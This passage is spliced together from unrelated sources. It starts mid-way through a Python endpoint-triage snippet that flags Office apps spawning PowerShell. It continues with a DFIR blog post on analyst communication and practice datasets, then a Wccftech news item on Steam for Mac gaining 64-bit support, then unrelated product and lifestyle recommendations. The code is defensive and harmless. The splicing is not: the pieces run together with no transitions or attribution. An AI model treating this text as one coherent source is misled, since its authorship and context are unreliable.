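    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Date"},
]

if __name__ == "__main__":
    for action, event in triage(SAMPLE_EVENTS):
        print(action.upper(), "->", event["CommandLine"][:60])
```

In a real deployment the "block" branch would call the EDR's kill/isolate API rather than print; the point is that the decision itself was made before the alert ever reached a human.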
In order to detect and respond quicker, this is going to require a couple of things:
I'll be addressing these topics in future blog posts.
Brett Shavers posted another great article in which he discussed a much-needed skill in DFIR, albeit one that isn't taught in any courses. That is, communicating with others. If you really think about it, this is incredibly, critically, vitally important. What good is it to have a good, great, or even the best threat intel or DFIR analyst, if they are unable to communicate with others and share their findings? And I'm not talking about just the end results, but also being able to clearly articulate what led to those findings. What is it that you're seeing, for example, that indicates that there's an adversary active in an environment, versus a bunch of persistence mechanisms kicking off when systems are booted? Can you articulate your reasoning, and can you articulate where the gaps are, as well?
Something to keep in mind...there is a distinct difference between being unable to clearly delineate or share findings, and simply being unwilling to do so.
DFIR Skillz - Tech Skillz
A great way to develop technical analysis DFIR skills is to practice technical analysis DFIR skills. There are a number of DFIR challenge images posted online and available for download that you can use to practice skills.
The CFReDS data leakage case provides a great opportunity to work with different types of data from a Windows 7 system, as well as from external devices.
The LoneWolf scenario at the DigitalCorpora site is pretty fascinating, as it allows you to practice using a number of tools, such as hindsight, Volatility, bulk_extractor, etc. The scenario includes an image of a Win 10 laptop with a user profile that includes browser (Chrome, IE) history, a hibernation file, a memory dump, a page file, a swap file, etc. This scenario and the accompanying data was produced by Thomas Moore, as his final project for one of Simson Garfinkel's courses at GMU. The challenge in this scenario will be learning from the image, having not taken the course.
Ali Hadi, PhD, makes a number of datasets available for download. I especially like challenge #1, as it's a great opportunity to try your hand at various analysis tasks, such as using Yara to detect webshells, etc. There are also a couple of other really cool things you can do with the available data; many thanks to @binaryz0ne for providing the scenarios and the datasets.
These are just a few examples of what's available; perhaps the best way to really get the most from these scenarios is to work with a mentor. I can see that many enthusiasts will download the images, maybe start down the road a bit, but not really get anywhere meaningful due to roadblocks of some kind. Having someone you can bounce ideas off ("how does this analysis plan look?"), seek guidance from, etc., would be a great way to move beyond where you are now, and really expand your skill sets.
DFIRDudes (Hadar and Martin) have kicked off (here's the tweet announcing it) a new blog with an inaugural post on StartupInfo files. This is a great idea, because as Brett had mentioned previously, there's a lot of great info that is peppered onto Twitter that really needs a much more permanent home someplace, one that's a bit roomier (and more persistent) than 280 characters. The first sentence of the first post really sets the tone, and gives the blog a good push away from the dock.
If you're on the fence about starting a blog, check out Phill's post, because his answer is a resounding "yes".
HelpNetSecurity had a fascinating article recently that discusses a surge in retail breaches. While this data is based on a survey, I still find it fascinating that in 2018, more organizations haven't pursued the implementation of instrumentation and visibility into their infrastructures that would provide for early detection and response. And yes, I do understand that the focus of the survey (and as a result, the data) is retailers, organizations that wouldn't necessarily have the budget for such things.
Perhaps the most telling part of the article is that, "Security spending is up but not aligning with risk."
I've received some great contributions to the repository over the past month or so; many, many thanks to those who've contributed plugins!
Developers are gearing up for the final release of macOS 10.14. Ahead of the public release, Steam has updated its Mac app with support for 64-bit. Not only that, the update also brings new design changes as well as forward-facing additions. The 64-bit support is important for Steam and other developers because macOS Mojave will be the last version which will support 32-bit applications. So let’s dive in to see some more details on the matter.
Steam For Mac Has Been Updated With 64-bit Support And Also Adds A New Design
It was noted in a Reddit thread that update to 64-bit support gives Steam a gigantic performance boost. The interface is now more responsive and the overall user experience is “significantly better” compared to the 32-bit version of the app. However, performance is not the only aspect which was kept in mind when developing the update.
The new Steam for Mac update now also includes a new chat system which is more modern and up to date. It is now more flexible and also provides features like group chat built for gaming. The new features and the layout can be found on Steam’s official website, so do check that out as well.
Apart from all this, the platform has also stopped using the pre-Yosemite windows button and now supports the current design.
Yesterday they pushed out a big update with a new chat system they had been testing recently, and, after checking, all of Steam finally seems to run on 64 bit now!
On top of that, they finally stopped using the pre-Yosemite window buttons and added the current versions.
Steam is one of the very few apps which has adopted the 64-bit support for macOS Mojave. The operating system started warning users earlier this year that all 32-bit applications would become redundant or incompatible. Apple also notified users and developers at the WWDC this year, stating that macOS Mojave will be the last version to support 32-bit apps.
There will be more to the story, so be sure to stay tuned in for more details. This is all for now, folks. What are your thoughts on the matter? Do you think developers should start updating their apps with 64-bit support? Let us know in the comments section below.
The post Steam For Mac Is Now 64-bit, Also Brings New Design And Chat Features by Ali Salman appeared first on Wccftech.
One of the best books I ever listened to is Shantaram. This very long story — 43 hours! — is the fictionalized autobiography of an Australian outlaw who hides out in the slums of Bombay, is thrown in Indian prison for drug dealing and eventually follows his guru to fight for the muhadjin in Afghanistan. He is a holy thief, a wise sinner, a coyote trickster, and this meld of the sacred and profane is what gives the story its epic rousing power. The narrator in the audible version does hundreds of foreign accents pitch-perfectly and captures the enthusiasm of the Indian sub-continent. Even after 43 hours I wished the story-telling would never end. — KK
Best news app
Smartnews is a free, lightweight, mobile app for iOS and Android. It presents the top news stories in different categories and is updated frequently. You can add your favorite news sites to it, too. When I want to find out what’s going on, it’s the first place I go. — MF
Indie online projects
MakeHub is a crowdsourced list of interesting and useful projects by indie developers. You can sort by which has the most social media followers or votes on Product Hunt. Through MakeHub, I came across colorkuler, which extracts and displays your Instagram color palette, and had fun comparing my palette with people I follow. — CD
High leverage philanthropy
I’ve been making micro-loans to entrepreneurs in the developing world via Kiva for 10 years. I loan small amounts (less than $100) to say, women in Africa hoping to buy a sewing machine to start their own sewing business, or herders in Bolivia needing some equipment to make cheese, and soon enough they will repay the loan, so I can re-loan the money again to someone else. I’ve gone through 4 cycles of loans for my first money, and there is less than 0.1% delinquency — a rate any bank would die for. 100% of my money goes to helping the individuals I select; Kiva’s operating costs are funded separately. The money keeps going around. It’s one of the best bargains in the world. — KK
Worry about it later list
I got the idea to make a worry list from this Forbes article on organizing your feelings. I keep a sticky note on my laptop and when something is bugging me I add it to the list and mentally shelve it until later. By the end of the day, most of it doesn’t matter and then I get to cross it out and that feels great. — CD
We have pantry moths in our kitchen cupboards, and can’t get rid of them. But we can greatly reduce how many there are with these moth traps. They look like little scout tents but the inner walls are coated with a sticky substance. Once every 9 months we replace the trap, which by then is covered with the creatures. — MF